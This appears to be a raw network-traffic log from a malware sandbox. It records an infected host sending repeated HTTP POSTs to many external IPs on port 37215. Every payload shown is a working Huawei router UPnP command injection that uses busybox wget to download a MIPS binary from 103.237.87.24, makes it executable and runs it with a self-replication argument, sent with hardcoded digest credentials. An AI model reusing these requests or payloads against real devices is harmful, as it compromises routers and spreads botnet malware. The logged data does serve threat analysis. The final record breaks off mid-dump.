                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  828192.168.2.133882041.146.123.10437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.368985891 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  829192.168.2.1337968152.51.235.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.368998051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  830192.168.2.1333982197.2.181.037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.369019985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  831192.168.2.1336090166.99.212.1937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.369035006 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  832192.168.2.1343444157.205.90.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.369041920 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  833192.168.2.1350680197.105.102.23337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.369059086 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  834192.168.2.1343242197.206.72.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.369064093 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  835192.168.2.134898641.170.243.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.369071960 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  836192.168.2.1337830197.180.0.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.369076014 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  837192.168.2.1345628157.17.150.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.374475956 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 